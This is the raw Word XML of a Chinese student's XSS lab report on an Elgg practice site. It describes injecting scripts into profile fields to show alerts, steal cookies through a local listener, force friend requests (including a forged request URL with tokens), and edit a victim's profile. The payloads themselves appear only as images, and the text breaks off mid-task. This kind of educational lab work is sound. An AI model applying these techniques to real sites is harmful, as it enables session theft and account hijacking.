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47CA7" w14:textId="1E7249E2" w:rsidR="00554F1E" w:rsidRDefault="00490531" w:rsidP="00490531">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网安实训报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21891D53" w14:textId="63273FA8" w:rsidR="00490531" w:rsidRDefault="00490531" w:rsidP="00490531">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C1FD6C" w14:textId="0A9A6BFA" w:rsidR="00490531" w:rsidRDefault="00490531" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7118139 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顾宸玮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1F2C" w14:textId="377A6265" w:rsidR="008F0438" w:rsidRDefault="008F0438" w:rsidP="008F0438">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0438">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D964E" w14:textId="24BBB760" w:rsidR="001E2399" w:rsidRPr="001E2399" w:rsidRDefault="001E2399" w:rsidP="008F0438">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2399">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先直接在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的profile里的Brief</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>description里写入以下脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A17D04" w14:textId="67057808" w:rsidR="008F0438" w:rsidRDefault="008F0438" w:rsidP="008F0438">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F0438">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5CFEA2" wp14:editId="0894D73B">
            <wp:extent cx="4908550" cy="2943593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46" cy="29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AA83" w14:textId="3D19BB32" w:rsidR="001E2399" w:rsidRPr="008F0438" w:rsidRDefault="001E2399" w:rsidP="008F0438">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存后，成功弹窗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C693865" w14:textId="1A420740" w:rsidR="00973E7A" w:rsidRDefault="00973E7A" w:rsidP="00973E7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00973E7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352A8CD3" wp14:editId="76399625">
            <wp:extent cx="4984750" cy="362363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07" cy="36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CD4D3" w14:textId="4F528666" w:rsidR="001E2399" w:rsidRDefault="001E2399" w:rsidP="00973E7A">
      <w:pPr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利用脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAD923" w14:textId="6609033F" w:rsidR="001E2399" w:rsidRPr="00973E7A" w:rsidRDefault="001E2399" w:rsidP="00973E7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s文件里加入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:t>.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA4052E" w14:textId="63BBDF1F" w:rsidR="00973E7A" w:rsidRPr="00973E7A" w:rsidRDefault="00973E7A" w:rsidP="00973E7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00973E7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09265BFF" wp14:editId="4B3BBC20">
            <wp:extent cx="4881708" cy="42005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77" cy="420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830E" w14:textId="400E3112" w:rsidR="00973E7A" w:rsidRDefault="001E2399" w:rsidP="00973E7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/</w:t>
      </w:r>
      <w:r>
        <w:t>var/www/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里创建“my</w:t>
      </w:r>
      <w:r>
        <w:t>scripts.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB0082" w14:textId="4E46B255" w:rsidR="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2399">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07A17FA8" wp14:editId="65DD28B7">
            <wp:extent cx="4268079" cy="37192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37" cy="372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56E6" w14:textId="699A077A" w:rsidR="001E2399" w:rsidRPr="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本内容为弹窗警告“X</w:t>
      </w:r>
      <w:r>
        <w:t>SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75546EFC" w14:textId="3AAC47E2" w:rsidR="00760FCE" w:rsidRPr="00760FCE" w:rsidRDefault="00760FCE" w:rsidP="00760FCE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73511C13" w14:textId="0F0B13E3" w:rsidR="001E2399" w:rsidRPr="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2399">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B8A4A4C" wp14:editId="72053ECA">
            <wp:extent cx="4596130" cy="40051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89" cy="40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6464" w14:textId="79240B8A" w:rsidR="00760FCE" w:rsidRPr="00760FCE" w:rsidRDefault="001E2399" w:rsidP="00760FCE">
      <w:p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profile中的“Brief</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>description”中写入以下脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C7E66" w14:textId="5B8525F6" w:rsidR="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2399">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104711A4" wp14:editId="7994C637">
            <wp:extent cx="4625340" cy="4030607"/>
            <wp:effectExtent l="0" t="0" r="381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723" cy="403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437C" w14:textId="014BB4C4" w:rsidR="001E2399" w:rsidRPr="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>成功弹出警告窗口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7888E9" w14:textId="15726FBE" w:rsidR="001E2399" w:rsidRPr="001E2399" w:rsidRDefault="001E2399" w:rsidP="001E2399">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2399">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F1CC9D9" wp14:editId="09587F61">
            <wp:extent cx="4801870" cy="4184437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897" cy="41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2A4E" w14:textId="4B030381" w:rsidR="00490531" w:rsidRDefault="00A30605" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA4CD2" w14:textId="0E23004F" w:rsidR="00A30605" w:rsidRPr="00A30605" w:rsidRDefault="00A30605" w:rsidP="00490531">
      <w:p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profile里修改成以下内容，以获取cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABBC590" w14:textId="6FCF90FE" w:rsidR="00A30605" w:rsidRDefault="00A30605" w:rsidP="00A30605">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A30605">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404A3ABA" wp14:editId="571AFFA3">
            <wp:extent cx="5274310" cy="2458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4641" w14:textId="54132101" w:rsidR="00A30605" w:rsidRPr="00A30605" w:rsidRDefault="00A30605" w:rsidP="00A30605">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>展示cookie成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2DD4BF" w14:textId="6C976720" w:rsidR="00A30605" w:rsidRPr="00A30605" w:rsidRDefault="00A30605" w:rsidP="00A30605">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A30605">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00CE6CBA" wp14:editId="7C8099C0">
            <wp:extent cx="4373880" cy="331470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A365" w14:textId="019911C9" w:rsidR="00A30605" w:rsidRDefault="00A30605" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C0C61" w14:textId="5EC217C6" w:rsidR="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新编辑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profile，将脚本中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改为1</w:t>
      </w:r>
      <w:r>
        <w:t>27.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA4781" w14:textId="235BD33B" w:rsidR="00C849B9" w:rsidRPr="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00C849B9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C849B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B700E5" wp14:editId="089DA8A7">
            <wp:extent cx="5113020" cy="1028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0D56" w14:textId="5B133700" w:rsidR="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在终端输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB9600" w14:textId="05982F40" w:rsidR="00C849B9" w:rsidRPr="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00C849B9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C849B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760EC5EA" wp14:editId="4D2E55A3">
            <wp:extent cx="5274310" cy="5695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E57A" w14:textId="1FCD1FD3" w:rsidR="00C849B9" w:rsidRPr="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果用Alice点击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主页，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通过监听，找到对方cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233535C3" w14:textId="63AD3791" w:rsidR="00C849B9" w:rsidRPr="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00C849B9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C849B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFA4BA8" wp14:editId="503A326C">
            <wp:extent cx="5274310" cy="22625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67EE" w14:textId="4883E691" w:rsidR="00C849B9" w:rsidRPr="00C849B9" w:rsidRDefault="00C849B9" w:rsidP="00C849B9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CA4F78" w14:textId="4F4C18CB" w:rsidR="00A30605" w:rsidRDefault="000A49A3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A49A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 4: Becoming the Victim’s Friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356015A3" w14:textId="02F6A474" w:rsidR="00D773D3" w:rsidRPr="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>首先用Alice添加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好友，用H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ive获得以下数据，得到添加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为好友时的链接以及</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。将其写入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主页中的“About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me”中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEDB47A" w14:textId="32A92649" w:rsidR="000A49A3" w:rsidRDefault="000A49A3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E2E9A89" wp14:editId="1D69DB40">
            <wp:extent cx="5274310" cy="1296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209A" w14:textId="19C5FA15" w:rsidR="000A49A3" w:rsidRDefault="008358B6" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="002A15F8" w:rsidRPr="003F1909">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/friends/add?friend=47&amp;__elgg_ts=1600220266&amp;__elgg_token=Zg6reNWVV8cNAAUt0S0lpw&amp;__elgg_ts=1600220264&amp;__elgg_token=sXVmDHIw5fWHxrroffFOJA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24F550E7" w14:textId="16E85EEC" w:rsidR="002A15F8" w:rsidRPr="002A15F8" w:rsidRDefault="00D773D3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将此栏切换成明文模式，点击右上角“</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML”，写入以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA55AE4" w14:textId="6EAC2C1C" w:rsidR="000A49A3" w:rsidRDefault="002A15F8" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E251A38" wp14:editId="506BAD7C">
            <wp:extent cx="4772025" cy="20288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C4C5" w14:textId="6B8E327D" w:rsidR="002A15F8" w:rsidRDefault="002A15F8" w:rsidP="002A15F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="936"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A15F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01BB8171" wp14:editId="11616F0C">
            <wp:extent cx="4924425" cy="2019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CC70" w14:textId="32072670" w:rsidR="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="002A15F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="936"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在保存后，登录</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号浏览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主页，加好友的脚本在后台进行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A7505" w14:textId="7AAABAE5" w:rsidR="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="002A15F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="936"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>amy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功成为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好友。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73234B2B" w14:textId="02D0E3FF" w:rsidR="002A15F8" w:rsidRDefault="00D773D3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D773D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A76CDEB" wp14:editId="1AC694ED">
            <wp:extent cx="5086350" cy="2085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6A68" w14:textId="7AC312A3" w:rsidR="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D773D3">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:t xml:space="preserve">Explain the purpose of Lines </w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➀</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➁</w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:t>, why are they are needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AEECDB" w14:textId="79DB56F2" w:rsidR="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="00490531">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在1和2从相关的Java</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cript变量中获得时间戳和秘密令牌的值。由于所有本页面发送给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的请求都要附加这两个值，把这两个值存储到变量中可以使访问更容易，也让攻击变得更容易。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA38AF5" w14:textId="39341AEA" w:rsidR="00D773D3" w:rsidRDefault="00D773D3" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D773D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D773D3">
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D773D3">
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D773D3">
        <w:t xml:space="preserve"> application only provide the Editor mode for the "About Me" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D773D3">
        <w:t>fifield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D773D3">
        <w:t>, i.e., you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF957C1" w14:textId="2185B244" w:rsidR="002C74D4" w:rsidRDefault="002C74D4" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有提供明文编辑器，仍然可以发动攻击，尽管攻击会稍微困难一点。比如，攻击者可以使用一个浏览器扩展来删除H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求中的格式化数据，或使用其他客户端来发送请求，并非一定需要浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211491C7" w14:textId="131C65BE" w:rsidR="002C74D4" w:rsidRDefault="002C74D4" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C74D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Modifying the Victim’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C74D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Profifile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4377D9E7" w14:textId="638D1263" w:rsidR="00EE3ACA" w:rsidRPr="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在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About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me这栏写入修改他人“About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me”的脚本，写入内容为“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
